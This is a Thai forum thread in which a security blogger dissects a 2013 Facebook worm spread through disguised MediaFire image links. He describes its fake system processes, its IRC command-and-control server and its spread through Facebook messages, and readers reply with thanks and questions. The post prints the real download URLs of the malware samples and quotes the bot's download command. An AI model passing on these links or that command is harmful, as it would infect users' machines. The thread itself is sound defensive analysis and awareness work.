ThaiSEOBoard.com

ความรู้ทั่วไป => รู้ทันกลโกงทางเน็ต => ข้อความที่เริ่มโดย: mayaseven ที่ 06 พฤษภาคม 2013, 22:26:53



หัวข้อ: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mayaseven ที่ 06 พฤษภาคม 2013, 22:26:53
Facebook Worm Analysis [ mediafire.com ] ชำแหละไวรัส Facebook
    เมื่อคืนนี้ผมกำลังนั้ง Analyze Malware ตัวหนึ่งซึ่งเป็น Trojan ธรรมดาแต่มีวิธีการใช้ Unicode ได้น่าสนใจ ผมก็นั้งเขียนโปรแกรมขึ้นมา Proof of Concept ลองนั้นลองโน่นจนใกล้จะเช้ากำลังจะเข้านอน ทันใดนั้นผมก็ได้รับข้อความจาก Facebook Friend คนหนึ่งตามรูปด้านล่าง



(http://4.bp.blogspot.com/-h5EaynNO2QY/UYcxE1iho8I/AAAAAAAABH4/6V5RT3j_qUw/s1600/1.png)

อยู่ดีส่ง Link มาแบบไม่มีปี่ไม่มีขลุ่ยแบบนี้ผมก็ฟันธงไปเลยเพื่อนผมติด Worm และกำลังจะแพร่พันธ์ุสู่เพื่อนชาว Facebook ผมก็คิดในพึ่ง Analyze เสร็จไปตัว กำลังจะเข้านอน ><" ไหน Friend ผมก็อุตสาห์หวังดีขนาดนี้ก็จัดให้เขาซักหน่อยเริ่มสร้าง Lab ขึ้นมา Analyze เลย

เริ่มจากสิ่งแรก Link: http://www.mediafire.com/?5rkaj8tibydkffp/image0377.bmp ดูเหมือนจะเป็นไฟล์รูปเพราะนามสกุลเป็น .bmp แต่ไหงพอกดเข้าไปแล้วกลายเป็นให้โหลดไฟล์ image07.jpeg.exe ไปได้ละนั้น ถ้าไม่สังเกตุโหลดไปแล้วกดเปิดก็เรียบร้อยโรงเรียนจีนไปเลยน่ะครับ

* Link นั้นเป็น Malware จริงอย่าโหลดมาลองถ้าไม่แน่จริง เพราะอาจจะเป็นภาระเพื่อนฝูงใน Facebook ได้ :P *

** สำคัญ: ไม่ควรเปิดไฟล์ประมวลผลได้เช่น .exe, .bat, .com, ... ที่เรา Download มาจากแหล่งที่ไม่น่าเชื่อถือ ให้คิดไว้ก่อนเลยว่านั้นคือไวรัสแน่ๆ แล้วชีวิตจะไม่เศร้า :P ส่วนสาเหตุว่าทำไมถึงเป็นอย่างนั้น สามารถไปอ่านบทความย้อนหลังใน Blog ดูได้ครับผมได้เขียนไว้แล้วว่าทำไมพร้อมทำวิดีโอแสดงให้ดู :P **

กลับมาเข้าเรื่องต่อ Trick ตรงนี้ก็ไม่มีอะไรมากคือ จะอันนี้ http://www.mediafire.com/?5rkaj8tibydkffp
หรืออันนี้ http://www.mediafire.com/?5rkaj8tibydkffp/mayaseven.png มันก็จะไป Download ไฟล์  image07.jpeg.exe เหมือนเดิมนั้นก็คือหลัง http://www.mediafire.com/?5rkaj8tibydkffp/ ตรงนี้ใส่อะไรก็ได้ไม่มีผล เขาก็เลยใส่ให้เหมือนว่าเป็นรูปทั้งชื่อและนามสกุลไฟล์ เพื่อให้เชื่อสบายใจในการเปิดดูนั้นเอง [Social Engineering]

พอรูปมาเปิดปุํบก็จะได้ผลงานตามรูป

(http://3.bp.blogspot.com/-Pzm2D2_yN4U/UYc1UDl_KmI/AAAAAAAABII/RWsDDnYlGLk/s640/2.png)


เมื่อ Malware ทำงานปุ๊บ มันก็จะเนี่ยสร้างไฟล์ชื่อ svchosts.exe นั้นแน่มีเนียนสร้างไฟล์ให้ชื่อเหมือนไฟล์ของระบบ หลังจากนั้นก็มีการเชื่อมต่อไปประมาณ 3-4 ที่นอกนั้งยังไม่พอ มันยังไป Download เพื่อน(Malware) ของมันมาอีกอยู่เบื้องหลังซึ่งเราไม่รู้หรอก เอ๊ะแต่ทำไมผมรู้ฮ่าๆ ที่อยู่ของเพื่อนมันคือ  http://www.mediafire.com/download.php?re6k3nnpftba8f2 เป็นไฟล์ชื่อว่า f.exe มันก็โหลดเพื่อนมันมาทำงานหน้าตาเฉย

ผลการ Scan Virus ไฟล์ image07.jpeg.exe จาก Virustotal

(http://1.bp.blogspot.com/-X722bH-E4AM/UYc41nC38EI/AAAAAAAABIk/D3Dl7OisQ7Q/s1600/3.png)

ผลการ Scan Virus ไฟล์ f.exe จาก Virustotal


(http://3.bp.blogspot.com/-XioQ4NbAVuE/UYc3jjBvNMI/AAAAAAAABIY/Wx1gFT-qguM/s1600/4.png)

มี Anti-Virus อยู่ 3 ตัวจาก 46 ตัวที่เห็นว่าเจ้าไฟล์นี้เป็น Malware หรือไวรัสตามภาษาชาวบ้าน ซึ่งเมื่อตอนเช้าที่ผมกำลัง Analyze นั้นมี Kaspersky  Scan เจออยู่ตัวเดียวว่าไฟล์นี้เป็น Malware แต่ตอนสายๆก็มีเพิ่มมาละเป็น 3 ตัว

แล้ว Malware มันทำอะไรกับเครื่องเราไปบ้างละ ?


เราจะมาดูกัน โดยทั่วไป Malware เมื่อสามารถ Inject เข้ามาที่เครื่องเหยื่อแล้วมันจะต้องวาง Backdoor หรือช่องทางที่จะเข้ามาควบคุมเครื่องเหยื่อเพื่อให้ทำงานได้อย่างที่ผู้สร้างต้องการ เช่น ขโมยความลับจากเครื่องเหยื่อหรือสั่งเครื่องเราไปยิงเครื่องชาวบ้าน เป็นต้น ซึ่งเจ้า Malware ตัวนี้ก็ไม่พลาดมีการ Reverse TCP ไปที่ Server ของผู้สร้างโดยใช้ IRC ในการสั่งการตามรูปด้านล่าง

* IRC นี่หลายคนอาจจะเกิดไม่ทัน มันเป็นช่องทาง Chat ที่เอาไว้คุยกันในสมัยก่อน ถ้าใครทันจะรู้จัก PIRCH พูดแล้วน้ำตาจะไหลมันคงเป็น 10 ปีแล้วซินะ :P ถ้าเปรียบเทียบกับสมัยนี้คงจะเป็นเหมือน Camfrog นั้นแล ซึ่ง IRC นี่นิยมมากในการเอามาใช้ควบคุม Bot ในกลุ่ม Hacker เรียกว่า Command and Conquer เอ้ยไม่ใช่ต้องเป็น Command and Control (C&C) Server นั้นแล ส่วนเครื่องเหยื่อที่ติด Malware ก็ถูกเรียกว่า Bot ในความหมายคือเหมือนหุ่นยนต์ที่สามารถเข้าไปบังคับควบคุมได้นั้นเอง *


(http://3.bp.blogspot.com/-sSP0S0L8yUw/UYc9C2RW7gI/AAAAAAAABI4/wr_o67VqvwY/s1600/5.png)


(http://2.bp.blogspot.com/-xhZ-uXDVVGE/UYc9of5JNvI/AAAAAAAABJA/ycRYeSDMJwk/s1600/6.png)


จากรูปด้านบน ผู้สร้าง Malware เขาอาจจะตกใจเล็กน้อยที่มีแขกไม่ได้รับเชิญ บุกเข้าไปถึงห้องควบคุมเหล่า Bot ของเขา :P

คำถามต่อมาแล้ว C&C Server ที่มันใช้ควบคุมตั้งอยู่ที่ไหนบนโลกนะ ?

คำตอบตามรูปด้านล่าง

(http://4.bp.blogspot.com/-YfOywAIEUlE/UYc_oY4d69I/AAAAAAAABJM/Sor1E3EkPeU/s1600/7.png)

ได้ความว่าเป็น Server ตั้งอยู่ที่ Germany สำหรับเจ้าหน้าที่ ที่ต้องการสือบสวนหาผู้สร้าง Malware ก็ได้ข้อมูลเพิ่มในการสืบสวนพอสมควรจากส่วนนี้

Function ของ Malware ตัวนี้ที่เจ๋งอีกอันก็คือส่ง Private Message มาถามว่าเป็น Malware ver ล่าหรือยังต้อง Update ไหม

/PRIVMSG #o.O :{DL}:  http://www.mediafire.com/download.php?re6k3nnpftba8f2 - Update: no

เป็น Malware ที่เป็นจริงเป็นจังสไตล์ Europe  APT (advanced persistent threat)  ซะจริงๆ  :P

และก็มาถึง Function สุดท้ายที่สำคัญ ก็คือ Function ที่มันเอาไว้แพร่พันธุ์ตัวเองผ่านทาง Facebook นั้นเอง เมื่อผมทำการเปิด Web Browser และ Login Facebook ก็มี Process ไม่ได้รับเชิญเกิดขึ้นมาตามรูปด้านล่าง

(http://2.bp.blogspot.com/-c4teW3eWd4M/UYdDURFmHdI/AAAAAAAABJc/3FRlMdP3Ct8/s1600/8.png)
                      

เจ้าไฟล์ regsrv64.exe ก็จะถูกเรียกขึ้นมาทำงาน ซึ่งที่น่าสนใจไฟล์นี้มีคำอธิบายด้วย Chocolate CupCake CupCake Chocolate Shit ซึ่งอาจจะเป็นชื่อเรียกเจ้า Malware นี้ในอนาคตก็เป็นได้ เมื่อไฟล์ ที่ regsrv64.exe ถูกเรียกขึ้นมาประมวลผลก็จะได้ผลดังรูปล่าง

(http://2.bp.blogspot.com/-S4QFypWlv4s/UYdEpqYOWiI/AAAAAAAABJo/KY03MIBtKgo/s640/9.png)


พอถึงเวลาอันเหมาะสมเจ้า Malware ก็จะทำการส่งข้อความไปให้เพื่อนใน Facebook เหมือนอย่างที่ผมได้รับในตอนต้นเรื่องนั้นเอง

(http://3.bp.blogspot.com/-Yn3QWsDPFtY/UYdFxqzZaFI/AAAAAAAABJ4/8azUneonfms/s640/10.png)

ซึ่งเทคนิคในการส่งข้อความนั้นผมจับ Signature บางอย่างได้ ทำให้ผมคิดว่าเขาน่าจะพัฒนา Script ในการส่งข้อความหา Friend ใน Facebook ของ Malware มาจาก Script การส่งข้อความหาเพื่อนทุกคนใน Facebook ของคุณ FiloSottile Source code ตาม Link: https://gist.github.com/FiloSottile/4215248/raw/c17775d928b650b3cb872d9131bce498543e9f27/krumiro_en.js


สรุป & การป้องกัน บทความนี้เราได้ชำแหละเจ้า Facebook Malware ตัวนี้ละเอียดประมาณหนึ่ง(ไม่ไหวที่จะเขียนยาวเพราะยังไม่ได้นอนเลย ~.~ ) เป็น Malware ที่มีความซับซ้อนอยู่ในระดับกลางๆ สำหรับวิธีการป้องกันนั้นก็อย่าคลิก Link มั่วซั่ว แม้กระทั้ง Link ที่เพื่อนเราส่งมาให้ ก็ให้ลองถามเขาดูก่อนว่าใช่เขาส่ง Link นั้นมาให้จริงๆไหม หรือเป็น Bot ที่ถูกควบคุมให้ส่ง Link นั้นมาให้กันแน่ และก็ทำการ Update Anti-Virus สม่ำเสมอครับ :)

สำหรับคนที่ติดเชื้อไปแล้วขั้นตอนที่ง่ายที่ทุกคนทำได้ในการแก้ไวรัสตัวนี้คือ
1.) ดูข้อความของเรา ว่ามีการส่ง Link แปลกๆไปหาเพื่อนๆใน Facebook หรือเปล่า
2.) ถ้ามีก็เริ่มจาก Update โปรแกรม Anti-Virus ที่เรามีก่อนแล้วลอง Scan ดูครับ
3.) ถ้า Scan แล้วเหมือนไม่เจออะไร และยังคงมีส่งข้อความ Link ไวรัสไปให้เพื่อนๆอยู่ ก็ให้ไปโหลด Kaspersky มาลงแล้ว Scan เพราะตัวนี้เป็นตัวแรกที่ Scan ไวรัสตัวนี้เจอและ ณ เวลาตอนเขียนบทความนี้ มีเพียง 3 ยี่ห้อที่ Scan เจอไวรัสตัวนี้
4.) พอ Clear เจ้าไวรัสออกไปได้ก็ทำการเปลี่ยนรหัสผ่าน และ Clear Session ที่ค้างอยู่ให้หมดซะเพราะผมยังไม่ได้ Analyze ลึกลงไปถึงตัว Process มันอาจจะมีการเก็บ Password ของเราส่งไปให้ผู้สร้าง ซึ่งมันทำแน่ๆอยู่แล้วเป็นผม ผมก็ทำ :P

สุดท้ายนี้ โชคดีปลอดภัยทุกคนครับ :P
สงสัยต้องการสอบถาม หรือ แนะนำ ติชม เพิ่มเติมสามารถเข้ามาพูดคุยกันได้ที่ https://www.facebook.com/pages/MaYaSeVeN/139105159494751

บทความต้นฉบับ http://www.mayaseven.com/2013/05/facebook-worm-analysis-mediafirecom.html

Written by MaYaSeVeN
http://mayaseven.com


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: ningnongkup ที่ 06 พฤษภาคม 2013, 22:37:01
svchosts.exe  มันคืออะไรครับ.... ทำไมบางเครื่องก็ขึ้นเยอะ..บางเครื่องก็ขึ้นน้อย.....แถมยังเรียกซ้ำกันอีก...เช่น..มี svchosts.exe    system  ขึ้นมาสองตัว ไม่รู้ว่ามันปกติหรือเปล่าครับ... :wanwan009:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: mayaseven ที่ 06 พฤษภาคม 2013, 22:41:41
svchosts.exe เป็น Services ของ Windows ครับขึ้นหลายอันก็ไม่แปลก แต่ต้องดูให้ดีว่าของจริงหรือของปลอมครับ :)

svchosts.exe  มันคืออะไรครับ.... ทำไมบางเครื่องก็ขึ้นเยอะ..บางเครื่องก็ขึ้นน้อย.....แถมยังเรียกซ้ำกันอีก...เช่น..มี svchosts.exe    system  ขึ้นมาสองตัว ไม่รู้ว่ามันปกติหรือเปล่าครับ... :wanwan009:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: instant ที่ 06 พฤษภาคม 2013, 22:51:45
เด่วนี้ เห็นลิงค์มาแล้วสยอง เพื่อนส่งเว็บมายังไม่กล้ากดเลย 555 หลอน  :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: konghyper ที่ 06 พฤษภาคม 2013, 23:09:15
สุดยอดเลยท่าน คาราวะ 1 จอก  :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: k_malee ที่ 06 พฤษภาคม 2013, 23:13:59
เยี่ยมเลยครับ  :wanwan020:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: aofiezzangz ที่ 06 พฤษภาคม 2013, 23:17:51
+1 ไป อย่ารอช้าๆ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: songwutk ที่ 06 พฤษภาคม 2013, 23:23:21
เจ๋งอ่ะ .. ใครทำได้นี่ SEO แรงเลยนะ

ฉันจะทำล้าน Like ในราคา 150 บาท (ไวรัสกรูเองเว้ย)


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการ
เริ่มหัวข้อโดย: G1 ที่ 06 พฤษภาคม 2013, 23:34:41
ตัวจริงเลยอะขอคาราวะ  :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: sarode ที่ 06 พฤษภาคม 2013, 23:37:59
เพิ่งเจอมากับตัว เลยวันนี้ ดีนะที่สังเกตเห็น .exe


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: djart ที่ 06 พฤษภาคม 2013, 23:43:19
สุดยอดครับ นึกถึง IRC เหมือนกัน เมื่อก่อนมี script ฝั่ง เอาไว้ยิงห้องชาวบ้าน  :wanwan016:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Tanut007 ที่ 06 พฤษภาคม 2013, 23:46:58
โหดครับ เห็นคำโปรยหัวก็รู้แล้วว่าใคร


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: atikanzaa ที่ 06 พฤษภาคม 2013, 23:48:21
สุดยอดครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: siamseo ที่ 06 พฤษภาคม 2013, 23:50:41
โหดมาก


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: banbanpom2 ที่ 06 พฤษภาคม 2013, 23:55:59
 :wanwan017: :wanwan017: โหดจิง


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: X-ZYTE ที่ 06 พฤษภาคม 2013, 23:56:09
MaYaSeVeN (http://ptcdn.info/emoticons/emoticon-thumbup.png)


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: kajonsak ที่ 06 พฤษภาคม 2013, 23:57:02
กดโหลดไปแล้วอะ  :-X


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: yen032 ที่ 06 พฤษภาคม 2013, 23:59:10
ไม่ได้กินผมหรอก  :-[


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: pash ที่ 06 พฤษภาคม 2013, 23:59:52
สุดยอดอธิบายได้ระเอียดมาก +1 ครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: terrorist[Denz] ที่ 07 พฤษภาคม 2013, 00:00:05
ผมก้โดน :'(


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: yukorn ที่ 07 พฤษภาคม 2013, 00:00:09
โหลดมาตายแน่ตอนนี้   :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: sodsaikung ที่ 07 พฤษภาคม 2013, 00:01:01
สำหรับผม วิธีแก้ไขข้อแรก ตัดเน็ตไปก่อน
ป้องกันมันส่ง password ออกไป
แล้วก็ หาอะไรมาจัดการมันซะ ก่อนที่มันจะเล่นงานผม

ผมใช้ตัวนี้ครับ Malwarebytes

โหลดทีนี้เลย
http://www.malwarebytes.org/products/malwarebytes_free/


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: securitybm ที่ 07 พฤษภาคม 2013, 00:01:32
เพื่อนผมโดน ตรึมเลย  :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: nrokas ที่ 07 พฤษภาคม 2013, 00:02:13
คนทั่วไปมุงกระทู้นี้เยอะมากเลย เกือบพันคน


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: jar2548 ที่ 07 พฤษภาคม 2013, 00:02:36
เป็นประโยชน์อย่างมากครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Kelberwitz ที่ 07 พฤษภาคม 2013, 00:02:50
ขอบคุณที่ช่วยมาเตือนกันครับ ได้ความรู้เยอะเลย  :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: isaiguni ที่ 07 พฤษภาคม 2013, 00:04:55
ไม่ไหว อย่างนี้ต้องแชร์บอกเพื่อนก่อน


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: After ที่ 07 พฤษภาคม 2013, 00:05:05
วิธีแก้สุดยอดครับ เห็นหลายคนเป็น ขอบคุณมากครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: marknary ที่ 07 พฤษภาคม 2013, 00:07:13
โดนไปแล้วเหมือนกัน process svhost ขึ้นเต็มเลย แยกไม่ออกไหนจริงไหนปลอม


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: pattaradit2 ที่ 07 พฤษภาคม 2013, 00:08:08
 :P คนดูเยอะจริงๆ  :wanwan004:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Joe Iceberg ที่ 07 พฤษภาคม 2013, 00:08:57
ผมถ้าเจอๆไฟล์อะไรแปลกๆมาจะไม่กดเลย  :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: siriyot00 ที่ 07 พฤษภาคม 2013, 00:11:09
ขอบคุณค้าบ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: toffyman ที่ 07 พฤษภาคม 2013, 00:12:03
 :wanwan015: แวะมามุง


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: ET ที่ 07 พฤษภาคม 2013, 00:13:03
 :wanwan017:

สุดยอดเลยครับ อ่านแล้วได้ประโยชน์มาก 

แอบนึกถึงหนังเรื่อง ดายฮาท ภาค 4 เลย

 :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: jajakob ที่ 07 พฤษภาคม 2013, 00:13:48
เพื่อนก็โดนมาเหมือนกัน   :P


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Queue ที่ 07 พฤษภาคม 2013, 00:14:24
มาอ่านขอบคุณคับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: hack-na ที่ 07 พฤษภาคม 2013, 00:14:56
 :wanwan003:  ความรู้ใหม่      :wanwan009:  แต่มันไม่ได้แอ้มเฟสผมหรอก


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: gunhotnews ที่ 07 พฤษภาคม 2013, 00:17:51
ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Pay_6677 ที่ 07 พฤษภาคม 2013, 00:23:34
ขอบคุณครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: panubon ที่ 07 พฤษภาคม 2013, 00:29:34
+1 ขอบคุณครับ กำลังฮิตเลย :wanwan044:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: cs2553 ที่ 07 พฤษภาคม 2013, 00:33:37
8 สมาชิก และ 278 บุคคลทั่วไป กำลังดูหัวข้อนี้   :wanwan013:

สุดยอดเลย +1


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: kkusd ที่ 07 พฤษภาคม 2013, 00:33:51
ไม่มีใครส่งมาเลย แต่แปลกที่บางทีข้อความที่เขียนส่งมาเป็นไทย


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: gamettt ที่ 07 พฤษภาคม 2013, 00:37:10
8 สมาชิก และ 278 บุคคลทั่วไป กำลังดูหัวข้อนี้   :wanwan013:

สุดยอดเลย +1
เมื่อตะกี้ประมาณ 1200 ครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: 4TB ที่ 07 พฤษภาคม 2013, 00:37:48
ถ้าเราไม่เปิดเเชทเลยจะมีโอกาศเจอไวรัสตัวนี้มั้ยครับ

เพราะผมไม่เคยออนไลน์เเชทเลย ออฟไลน์ตลอด


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: c0h32a ที่ 07 พฤษภาคม 2013, 00:41:18
น่าจะหายไปและครับ เดะ mf+fb เขาก็ patch เอง


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: isaiguni ที่ 07 พฤษภาคม 2013, 00:44:03
คนทั่วไปมุงกระทู้นี้เยอะมากเลย เกือบพันคน

ตอนนี้ปาเข้าไปเกือบหมื่นคนแระ สุดยอดจริงๆครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: kiak ที่ 07 พฤษภาคม 2013, 00:53:25
สงสัยนิดนึงอะครับ อยากรู้ว่า ทำยังไงถึงรู้ว่ามันส่ง irc หรอครับ ใช้ wireshark จับดูใช่ปะครับ หรือว่ามีวิธีอื่นครับ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: conviction ที่ 07 พฤษภาคม 2013, 00:55:34
ขอบคุณมากครับ มีประโยชน์มากๆ


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: nst_nk ที่ 07 พฤษภาคม 2013, 00:56:22
 :'(  มีส่งมาหลายคนเลยครับ เพื่อนใน list


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Giez ที่ 07 พฤษภาคม 2013, 00:59:06
สุดยอดครับ :wanwan017:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Jinns ที่ 07 พฤษภาคม 2013, 01:00:00
ผมอยากทราบว่ามันเข้าไปอยู่ใน Mediafire ได้อย่างไรครับ แสดงว่า Mediafire โดนแล้วหรอกครับ แล้วทำไมเขาไม่จัดการลบมันออก คิดแล้วก็สงสัย


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: Mr.Bet ที่ 07 พฤษภาคม 2013, 01:04:05
 :wanwan031:

ความรู้ทั้งนั้น


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: framing ที่ 07 พฤษภาคม 2013, 01:10:35
น่ากลัวจังเลย  :wanwan035:


หัวข้อ: Re: ชำแหละไวรัส Facebook ตัวใหม่ล่าสุด Mediafire ชำแหละการทำงานของไวรัสตัวนี้อย่างละเอียด
เริ่มหัวข้อโดย: ET ที่ 07 พฤษภาคม 2013, 01:16:37
ท่านนี้ White Hat ของแท้ 

ผมตามอ่านตั้งแต่ กระทู้แรกแล้ว 

